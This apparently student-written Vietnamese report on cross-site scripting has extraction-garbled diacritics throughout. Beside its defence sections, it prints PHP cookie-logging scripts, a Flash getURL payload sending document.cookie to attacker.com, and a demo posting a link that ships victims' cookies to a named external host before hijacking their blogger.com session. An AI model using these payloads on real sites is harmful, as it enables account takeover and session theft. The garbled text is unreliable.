Chuyên đề XSS

Tìm hiểu về tấn công XSS

MỤC LỤC

1.Gi i thi u chungớ ệ .................................................................................................................................3

2.Phân lo i XSSạ .......................................................................................................................................5

2.1. Stored XSS Attacks...................................................................................................................5

2.2. Reflected XSS Attacks.............................................................................................................6

2.3 XSS Attack Consequences......................................................................................................6

3.Ho t đ ng c a XSSạ ộ ủ ...........................................................................................................................7

3.1. Ho t đ ng c b nạ ộ ơ ả ....................................................................................................................7

3.2. Cac b c t n công b ng ky thu t XSSướ â ă â ...........................................................................8

4.Ki m tra l i XSSể ỗ .................................................................................................................................9

5. M t s hinh th c t n công ph bi n trong th c t thông qua l i XSSộ ô ư â ô ê ư ê ỗ .................10

5.1. Chen đo n ma nguy hi m:ạ ể .................................................................................................10

5.2.T n công XSS b ng Flashâ ă ....................................................................................................11

6.H u qu c a XSSâ ả ủ .............................................................................................................................11

7.Cach phòng ch ng XSSô ..................................................................................................................12

7.1. L cọ ................................................................................................................................................13

7.2. Ma hóa.........................................................................................................................................13

8. DEMO: Tri n khai k ho ch t n công 1 blogerể ê ạ â ...............................................................13

9.T ng k tô ê .............................................................................................................................................18

10. Tài li u tham kh oệ ả .....................................................................................................................18


Nhóm 3-D08HTTT1


1.Gi i thi u chungớ ệTrong nh ng năm g n đây, Vi t Nam ngày càng phat tri n và nh tữ ầ ệ ể â

là v m t công ngh thông tin. Đ c bi t là v ng d ng web, h u nh m iề ặ ệ ặ ệ ề ư ụ ầ ư ọ

ng i ai cũng t ng nghe và làm vi c trên ng d ng web. Website tr nênườ ừ ệ ư ụ ở

ph bi n và tr thành m t ph n quan tr ng c a m i ng i và nh t là cacô ê ở ộ ầ ọ ủ ọ ườ â

doanh nghi p, công ty. ệ

Website ngày nay r t ph c t p và th ng là cac web đ ng, n i dung c aâ ư ạ ườ ộ ộ ủ

web đ c c p nh t thông qua cac thành viên tham gia kh p m i n i trênượ â â ở ắ ọ ơ

th gi i. Và h u h t cac website này dùng Cookie đ xac th c ng i dùng . ê ớ ầ ê ể ư ườ

Đi u này đ ng nghĩa v i vi c Cookie c a ai thi ng i đó dùng, N uề ồ ớ ệ ủ ườ ê

l y đ c Cookie ng i dùng nàoâ ượ ườ Hacker sẽ gi m o đ c chính ng iả ạ ượ ườ

dùng đó(đi u này là h t s c nguy hi m). V y làm sao đ cac hacker có thề ê ư ể â ể ể

l y cookie c a b n? Có r t nhi u cach đ cac hacker làm vi c đó, đâyâ ủ ạ â ề ể ệ ở

chúng tôi xin trinh bày m t trong nh ng cach mà hacker th ng dùng, đóộ ữ ườ

chính là h nh vào l i Cross Site Scripting(XSS). ọ ờ ỗ

Cùng v i nhu c u vi t cac ng d ng ngày càng m r ng ch c năngớ ầ ê ư ụ ở ộ ư

cho ng i dùng, thi cac ch c năng cho phép thành viên post n i dung làườ ư ộ

m t thao tac t t y u. Tuy nhiên, cho phép thành viên g i n i dung sẽ làmộ â ê ử ộ

phat sinh r t nhi u nguy c đe d a t i s an toàn c a website, trong đó cóâ ề ơ ọ ớ ư ủ

m t m i đe d a r t ph bi n đó là t n công Cross-Site Scripting (XSS).ộ ô ọ â ô ê â

V y, Cross-Site Scripting là gì?ậ

Cross-Site Scripting hay còn đ c g i t t là XSS (thay vi g i t t làượ ọ ắ ọ ắ

CSS đ tranh nh m l n v i CSS-Cascading Style Sheet c a HTML) là m t kĩể ầ ẫ ớ ủ ộ

thu t t n công b ng cach chen vào cac website đ ng (ASP, PHP, CGI, JSP ...)â â ă ộ

nh ng th HTML hay nh ng đo n ma script nguy hi m có th gây nguyữ ẻ ữ ạ ể ể

h i cho nh ng ng i s d ng khac. Trong đó, nh ng đo n ma nguy hi mạ ữ ườ ử ụ ữ ạ ể

đ c chen vào h u h t đ c vi t b ng cac Client-Site Script nhươ ầ ê ượ ê ă ư

JavaScript, JScript, DHTML và cũng có th là c cac th HTML.Kĩ thu t t nể ả ẻ â â


công XSS đa nhanh chóng tr thành m t trong nh ng l i ph bi n nh tở ộ ữ ỗ ô ê â

c a Web Applications và m i đe do c a chúng đ i v i ng i s d ngủ ô ạ ủ ô ớ ườ ử ụ

ngày càng l n.ớ

Cross-Site Scripting (XSS) là m t trong nh ng kĩ thu t t n công phộ ữ â â ô

bi n nh t hi n nay, đ ng th i nó cũng là m t trong nh ng v n đ b oê â ệ ồ ờ ộ ữ â ề ả

m t quan tr ng đ i v i cac nhà phat tri n web và c nh ng ng i s d ngâ ọ ô ớ ể ả ữ ườ ử ụ

web. B t ki m t website nào cho phép ng i s d ng đăng thông tin màâ ộ ườ ử ụ

không có s ki m tra ch t chẽ cac đo n ma nguy hi m thi đ u có th ti mư ể ặ ạ ể ề ể ề

n cac l i XSSẩ ỗ

Thông thường hacker lợi dụng địa chỉ URL để đưa ra những liên kết là

tác nhân kích hoạt những đoạn chương trình được viết bằng ngôn ngữ máy

khách như VBScript,JavaScript…được thực thi trên chính trình duyệt của nạn

nhân.

XSS được thực hiện trên các thẻ JavaScript, và các thẻ JavaScript chúng có thể làm được những công việc sau:

1. Thay đổi cấu trúc của toàn bộtrang web.

2. Tạo tùy ý các phần tử HTML.

3. Định tuyến lại các hình thức liên kết

Nhóm 3-D08HTTT1


4. Phục hồi dữ liệu,xác thực

5. Gửi và nhận dữ liệu

6. Đọc các tổ hợp phím

2.Phân lo i XSSạ

XSS đ c phân làm hai lo i là Stored XSS và Reflected XSS.ượ ạ

2.1. Stored XSS AttacksStored XSS là hinh th c t n công mà đó cho phép k t n công cóư â ở ẻ â

th chen m t đo n script nguy hi m (th ng là Javascript) vào websiteể ộ ạ ể ườ

c a chúng ta thông qua m t ch c năng nào đó (vd: vi t l i binh,ủ ộ ư ê ờ

guestbook, g i bài..), đ t đó khi cac thành viên khac truy c p website sẽở ể ừ â

b dính ma đ c t k t n công này, cac ma đ c này th ng đ c l u l iị ộ ừ ẻ â ộ ườ ượ ư ạ

trong database c a website chúng ta nên g i là Stored. Stored XSS phatủ ọ

sinh do chúng ta không l c d li u do thành viên g i lên m t cach đúngọ ữ ệ ở ộ

đ n, khi n cho ma đ c đ c l u vào Database c a website.ắ ê ộ ượ ư ủ

Nhóm 3-D08HTTT1


Hinh 1. Mô t v Stored XSSả ề

2.2. Reflected XSS Attacks

Trong hinh th c này, k t n công th ng g n thêm đo n ma đ c vào URLư ẻ â ườ ắ ạ ộ

c a website chúng ta và g i đ n n n nhân, n u n n nhân truy c p URL đó thi sẽủ ở ê ạ ê ạ â

b dính ma đ c. Đi u này x y ra do ta không chú ý filter input t URL c aị ộ ề ả ừ ủ

website minh

Nhóm 3-D08HTTT1


Hinh 2. Mô t v Reflected XSSả ề

2.3 XSS Attack Consequences

Phương pháp này tương tự như 2 phương pháp trên. Tuy nhiên, điểm khác biệt

là cách mà payload được đưa tới server. Một site “read only” hay “brochureware”

cũng có thển hiễm XSS. XSS có thể gây thiệt hại từ mức độ nhỏ đến lớn như việc

chiếm tài khoản của người sử dụng. Một cuộc tấn công XSS có thể lấy được session

cookie, gây mất tài khoản sử dụng. Hoặc có thể ảnh hưởng tới dữ liệu người dùng đầu

cuối bằng cách cài đặt Trojan, hoặc redirect trang web người truy cập sang một trang

khác, hoặc thay đổi nội dung của một trang.

Nhóm 3-D08HTTT1


3.Ho t đ ng c a XSSạ ộ ủ

3.1. Ho t đ ng c b nạ ộ ơ ảV c b n, ho t đ ng c a XSS có th đ c mô t nh sau:ề ơ ả ạ ộ ủ ể ượ ả ư

Hinh 2.5. Mô t ho t đ ng c a XSSả ạ ộ ủ

Theo nguyên t c trên, m t hacker có th l i d ng cac l h ng b o m t t ắ ộ ể ợ ụ ỗ ô ả â ừ

m t website. Cac th HTML đ u có th là công c cho cac cu c t n công ộ ẻ ề ể ụ ộ â

b i kĩ thu t XSS, trong đó 2 th IMG và IFRAME có th cho phép trinh ở â ẻ ể

duy t load thêm cac website khac khi cac l nh HTML đ c hi n th . L i ệ ệ ượ ể ị ợ

d ng nguyên t c này, cac hacker có th chen cac đo n ma đ c vào và ụ ắ ể ạ ộ

khi n may n n nhân b t n công XSSê ạ ị â

V c b n XSS cũng nh SQL Injection hay Source Injection, nó cũng là cacề ơ ả ư

yêu c u (request) đ c g i t cac may client t i server nh m chen vào đóầ ượ ử ừ ớ ă

cac thông tin v t qua t m ki m soat c a server.ượ ầ ể ủ

Nh ng n u nh cac kĩ thu t t n công khac có th làm thay đ i đ c dư ê ư â â ể ô ượ ữ

li u ngu n c a web server (ma ngu n, c u trúc, c s d li u) thi XSS chệ ồ ủ ồ â ơ ở ữ ệ ỉ

gây t n h i đ i v i website phía client mà n n nhân tr c ti p là nh ngô ạ ô ớ ở ạ ư ê ữ

Nhóm 3-D08HTTT1


ng i khach duy t site đó. T t nhiên đôi khi cac hacker cũng s d ng kĩườ ệ â ử ụ

thu t này đ deface cac website nh ng đó v n ch t n công vào b m tâ ề ư ẫ ỉ â ề ặ

c a website. Th t v y, XSS là nh ng Client-Side Script, nh ng đo n ma nàyủ â â ữ ữ ạ

sẽ ch ch y b i trinh duy t phía client do đó XSS không làm nh h ngỉ ạ ở ệ ả ưở

đ n h th ng website n m trên server. M c tiêu t n công c a XSS khôngê ệ ô ă ụ â ủ

ai khac chính là nh ng ng i s d ng khac c a website, khi h vô tinh vàoữ ườ ử ụ ủ ọ

cac trang có ch a cac đo n ma nguy hi m do cac hacker đ l i h có th bư ạ ể ể ạ ọ ể ị

chuy n t i cac website khac, đ t l i homepage, hay n ng h n là m t m tể ớ ặ ạ ặ ơ â â

kh u, m t cookie th m chí may tính b n có th sẽ b cài cac lo i virus,ẩ â â ạ ể ị ạ

backdoor, worm

Trong ki thuật XSS thường thì các link mà hacker dùng đêu được ma

hóa nên người dùng khó mà phát hiện ra.

3.2. Cac b c t n công b ng ky thu t XSSướ â ă ậ

B1 : Tìm các Website có tính chất sau :

- Hiển thị cửa sổ thông báo lỗi, trong thông báo lỗi có cả các thông tin do người

dùng đa đăng nhập sai.

- Các cửa sổ có chứa các phần nhập dữ liệu người dùng.

- Các chức năng tìm kiếm có chức năng hiển thị lại từ khóa người dùng đa nhập.

B2 : Tiếp theo hacker sẽ tạo ra URL, trong đó có chứa các lệnh JavaScript.

Trong URL đó có liên kết tới site của hacker nhằm chuyển thông tin người

dùng đa đăng nhập tới site này.

B3 : Gia mạo email hoặc post bài viết, trong đó có chứa URL đa tạo ở bước 2,

URL chính là một đường liên kết (link). Người dùng được gợi ý là bấm vào liên

kết này để kiểm tra lời mật khẩu hoặc nhận một dịch vụ miễn phí nào đó.

Nhóm 3-D08HTTT1


B4 : Người dùng sẽ bấm vào kết nối và nhập vào username và password, hai

thông tin này sẽ được bí mật gửi vê Server của người tấn công trước khi được

gửi tới Website thật. Người dùng sẽ tiếp tục dùng ứng dụng web bình thường

mà không hê biết rằng thông tin bí mật của mình đa bị đánh cắp.

4.Ki m tra l i XSSể ỗ

L i x y ra nh th nào ?ỗ ả ư ế

L i này x y ra khi ng d ng web thu nh n cac d li u nguy hi mỗ ả ư ụ â ữ ệ ể

đ c nh p t hacker . Nh b n đa bi t thi 1 website th ng ch a cac link ,ượ â ừ ư ạ ê ườ ư

thông qua cac link này hacker có th chen cac đo n code vào và khi ng iể ạ ườ

dùng nào đó s d ng link này thi g n nh ch c ch n đa b t n công , cóử ụ ầ ư ắ ắ ị â

th nói là hacker có th thông qua l i này đ chen code vào site hay linkể ể ỗ ể

đ l y cac thông tin quan tr ng t n n nhân, cac thông tin quan tr ng ể â ọ ừ ạ ọ ở

đây có th là cookie ho c username + pass đ vào tài kho n 1 ngân hàngể ặ ể ả

nào đó sau đó thông tin này đ c g i t i cho hacker . Cach th ng dùngượ ử ớ ườ

c u hacker là ma hóa cac ph n nguy hi m c a link(đa chen code) thànhả ầ ể ủ

ki u HEX (ho c có th là cac hinh th c khac) đ làm cho n n nhân ít nghiể ặ ể ư ể ạ

ng khi click vào link ch ma đ c đó. H u h t cac ng d ng web hi n nayờ ư ộ ầ ê ư ụ ệ

dùng cookie đ k t h p m t tài kho n duy nh t cho m t ng i dùng nàoể ê ợ ộ ả â ộ ườ

đó, nghĩa là cookie c a ng i nào thi ng i đó s d ng.ủ ườ ườ ử ụ

Cac webmail, web ban hàng, nhà băng,....... đa s đ u dùng cookie v i m cô ề ớ ụ

đích ch ng th c ng i dùng, và đây cũng là đi u mà hacker c n. V y chenư ư ườ ề ầ â

code là chen JavaScript(thông d ng ), Vbscript, ActiveX, HTML, ho c Flashụ ặ

Đ ki m tra xem site đó có b XSS hay không có hai cach sauể ể ị

Sư dung Tool

Sử dụng nhiêu chương trình dò quét lỗi của ứng dụng web, ví dụ như chương

trình Web Vulnerability Scanner để dò quét lỗi XSS.

Thư băng code

Nhóm 3-D08HTTT1


Xác định các phần cần kiểm tra lỗi XSS. Một site bất kì bao giờ cũng có

các phần : Search , error message, web form. Chủ yếu lỗi XSS nằm ở phần này.

Xác minh website có bị lỗi XSS không bằng cách xem các thông tin trả

vê. Ví dụ : Không tim thây XSS … hay Tai khoan XSS không chinh xac… ,

Đăng nhâp vơi XSS không thanh công… khi đó khả năng bị lỗi XSS là rất cao.

Khi xác định được vị trí bị lỗi, ta chen code vào để kiểm tra 1 lần nữa. Ví

dụ : Chen đoạn code < script>alert('XSS')< /script> vào ô bị lỗi và nhấn

submit, nếu nhận được popup có chữ “ XSS” thì chắc chăn chỗ đó bị lỗi.

5. M t s hình th c t n công ph bi n trong th c t thông qua ộ ô ư â ô ế ư ếl i XSSỗ

5.1. Chen đo n ma nguy hi m:ạ ể

- Hacker tạo 1 file info.txt và upload lên host- Tiếp đó, tạo file cookie.php với nội dung sau

- Tạo link trên diễn đàn hoặc mail có nội dung như sau :

http:// hostxss.com/search.cgi?query=<script>alert(document.cookie)</script>

Nhóm 3-D08HTTT1

<?php

$cookie = $_GET['c'];

$ip = getenv('REMOTE_ADD');

$date = date("j F, Y, g:i, a");;

$referer = getenv('HTTP_REFERER');

$fp = fopen('info.txt','a');

fwrite($fp,'Cookie: '.$cookie. 'IP:' .$ip. 'date:' .$date. 'Referer: '.$referer.' ');

fclose($fp);header("location: http:// hostxss.com /");

?>


5.2.T n công XSS b ng Flashâ ăNgoài nh ng cach đ a m t đo n ma nguy hi m thi hacker còn cóữ ư ộ ạ ể

th l i d ng nh ng t p tin flash đ đanh c p thông tin. Macromedia Flashể ợ ụ ữ â ể ắ

cho phép l p trinh b ng m t ngôn ng k ch b n đa đ c xây d ng s nâ ă ộ ữ ị ả ượ ụ ẵ

trong Flash là ActionScript. ActionScript có cú phap đ n gi n và t ng tơ ả ươ ư

nh JavaScript, C hay PERL. Ví d hàm getURL() dùng đ g i m t trangư ụ ể ọ ộ

web khac, tham s th ng là m t URL ch ng h n nhô ườ ộ ẳ ạ ư

“http://www.yahoo.com”.

Ví d 5ụ : getURL(“http://www.yahoo.com”)

Tuy nhiên có th thay th URL b ng JavaScriptể ê ă

getURL(“javascript:alert(document.cookie)”)

Ví d trên sẽ làm xu t hi n b ng thông bao ch a cookie c a trangụ â ệ ả ư ủ

web ch a t p tin flash đó. Nh v y là trang web đó đa b t n công, b ngư â ư â ị â ă

cach chen m t đo n JavaScript vào ng d ng Web thông qua t p tin flash.ộ ạ ư ụ â

M t ví d khac rõ h n v cach t n công này là: Đây là đo n l nh trong t pộ ụ ơ ề â ạ ệ â

tin flash và sẽ đ c thi hành khi t p tin flash đ c đ c: ượ â ượ ọ

getURL(“javascript:location(„http://www.attacker.com?

newcookie=‟+document.cookie)”)

Nh v y là khi ng i dùng xem trang web ch a t p tin flash này thi ngayư â ườ ư â

l p t c cookie c a h do trang web ch a t p tin flash đó t o ra sẽ g i vâ ư ủ ọ ư â ạ ử ề

cho hacker.

Nhóm 3-D08HTTT1


6.H u qu c a XSSậ ả ủ

XSS khai thác thường được sử dụng để đạt được các kết quả độc hại sau đây:

Truy cập thông tin nhạy cảm hoặc bị hạn chế

Ăn cắp tiên.

Theo dõi thói quen lướt web của người dùng

Thay đổi năng của trình duyệt

Bôi nhọ danh tiếng của một cá nhân hay công ty

Hủy hoại ứng dụng Web.

Tấn công từ chối dịch vụ

XSS là một kỹ thuật phổ biến để đưa các đoạn ma độc hại vào trong quá trình

truy cập web của người dùng. Đây là một kỹ thuật được dùng phổ biến để lừa

đảo, script kiddies, và spammers.

Lỗ hổng Cross Site Scripting cho phép hacker chạy một đoạn ma JavaScript tại

máy tính người truy cập và có thể ăn cắp thông tin cá nhân được lưu trong máy

tính của người sử dụng dưới dạng cookie trình duyệt, giả mạo website đăng

nhập để ăn cắp thông tin cá nhân.

Tấn công XSS có thể cho phép một trang web chen thêm các đoạn ma vào một

trong trang web khác. Trong những vụ tấn công thế này, người dùng sẽ nghi

rằng mình đang tương tác với một trang web đáng tin cậy. nhưng thực ra có thể

họ đang tương tác giúp kích hoạt đoạn ma độc hại từ một trang web khác.

...

Nhóm 3-D08HTTT1


7.Cach phòng ch ng XSSô

- Một tấn công XSS chỉ thực hiện được khi gửi một trang web cho trình duyệt

web của nạn nhân có kem theo ma script độc của kẻ tấn công. Vì vậy những

người phát triển web có thể bảo vệ website của mình khỏi bị lợi dụng thông qua

những tấn công XSS này, đảm bảo những trang phát sinh động không chứa các

tag của script bằng cách lọc và xác nhận hợp lý các dữ liệu đầu vào từ phía

người dùng hoặc ma hóa(endcoding) và lọc các giá trị xuất cho người dùng.

7.1. L cọ Luôn luôn lọc các dữ liệu nhập từ phía người dùng bằng cách lọc các kí tự

meta (kí tự đặc biệt) được định nghia trong đặc tả của HTML. Mỗi trường nhập

liệu bao gồm cả tham số liên kết sẽ được kiểm tra để phát hiện các thẻ script.

7.2. Ma hóa Lỗi XSS có thể tránh được khi máy chủ Web đảm bảo những trang phát

sinh được ma hóa (encoding) thích hợp để ngăn chạy chạy các script

không mong muốn.

Ma hóa phía máy chủ là một tiến trình mà tất cả nội dung phát sinh động

sẽ đi qua một hàm ma hóa nơi mà các thẻ script sẽ được thay thể bởi ma

của nó.

Nói chung, việc ma hóa(encoding) được khuyến khích sử dụng vì nó

không yêu cầu bạn phải đưa ra quyết định những kí tự nào là hợp lệ hoặc

không hợp lệ.Tuy nhiên việc ma hóa tất cả dữ liệu không đáng tin cậy có

thể tốn tài nguyên và ảnh hưởng đến khả năng thực thi của một số máy

chủ

Nhóm 3-D08HTTT1


8. DEMO: Tri n khai k ho ch t n công 1 blogerể ế ạ â

Nội dung : Kẻ tấn công đính ma độc vào bài viết trên blog của mình và hack tài khoản của các bloger khác khi họ đọc bài viết đó.

Phương thức thực hiện : Đoạn ma độc sẽ copy cookie ( file lưu trữ user và password của người dùng), hacker sẽ sử dụng cookie đó để truy cập vào tài khoản của họ.

Bươc 1

Hacker đăng nhập vào blog của mình và viết 1 bài viết có đính ma độc

Trong đó :

http://daivt.0fees.net : server nh n thông tin c a hackerâ ủ chuyende.php :ch a đo n ma l y c p thông tin ( đây làư ạ â ắ ở

cookie ) document.cookie :n i l u tr cookie trong may tínhơ ư ữ

Bài viết của hacker có dạng như sau:

Nhóm 3-D08HTTT1

Code : Ai muôn mât account thi <aonclick="document.location=’http://daivt.0fees.net/

chuyende.php?cookie='+escape(document.cookie);"href="#">click here </a>

http://daivt.0fees.net/


Trong đó :

- http://daivt.0fees.net là server nh n thông tin c a hackerâ ủ

- chuyende.php ch a đo n ma l y c p thông tin ( đây là cookieư ạ â ắ ở

)

- document.cookie n i l u tr cookie trong may tínhơ ư ữ

Bài viết của hacker có dạng như sau:

Nhóm 3-D08HTTT1

http://daivt.0fees.net/


Khi victim nhấn vào click here , đoạn ma độc trong “ chuyende.php “ lập tức thực thi

Cookie của victim đa được tự động gửi đến server của Hacker

Bươc 2

Hacker truy cập vào server của mình để lấy cookie

Nhóm 3-D08HTTT1

Code chuyende.php

<?php

$cookie=$HTTP_GET_VARS["cookie"];

$date=date("j F, Y, g:i, a");

$user_agent=$_SERVER('HTTP_USER_AGENT');

$file=fopen('info.txt','a');

fwrite($file,"DATE : $date || USER AGENT:$user_agent || cookie: $cookie\n");

fclose($file);

?>


Bươc 3

Hacker sử dụng cookie đa lấy để vào tài khoản của victim

- Cài Cookie Editer cho firefox- Vào Tools / Cookie Editer / Add- Điên các thông tin lấy được từ Cookie của victim vào như sau

- Save

Cuối cùng Hacker truy cập vào website : http://blogger.com

Khi đó tài khoản của victim đa tự động được đăng nhập

Nhóm 3-D08HTTT1

http://blogger.com/


9.T ng k tô ế

Cac hi m h a t môi tr ng Internetể ọ ừ ườ

Ky thu t XSS kha ph bi n và d dàng ap d ng, tuy nhiên m c đâ ô ê ễ ụ ư ộ

thi t h i ch d ng l i m c đ t n công trên may n n nhân thông quaệ ạ ỉ ừ ạ ở ư ộ â ạ

nh ng liên k t hay form l a đ o mà hacker đ a đ n cho n n nhân. Vi th ,ữ ê ừ ả ư ê ạ ê

ngoài vi c ng d ng ki m tra tính đúng đ n c a d li u tr c khi sệ ư ụ ể ắ ủ ữ ệ ướ ử

d ng thi vi c c n nh t là ng i dùng nên c nh giac tr c khi b c vàoụ ệ ầ â ườ ả ướ ướ

m t trang Web m i. C th nói, nh vào s c nh giac này c a ng i dùngộ ớ ỏ ể ờ ư ả ủ ườ

thi 90% đa đ t đ c s b o m t trong ky thu t này.ạ ượ ư ả â â

10. Tài li u tham kh oệ ả

1. Security - 2009 - Network security guide – COMPTIA

2. Security - 2010 - 7 deadliest attacks - Web app

3. Bảo vệ một website – Nhóm SV ĐH Bách Khoa TP.HCM

4. http://ha.ckers.org/xss.html

5. http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html

6. http://vibe.vn/threads/35350/

7. https://www.owasp.org/index.php/XSS

Nhóm 3-D08HTTT1


Nhóm 3-D08HTTT1

Chuyên đề XSS

Documents

Transcript of Chuyên đề XSS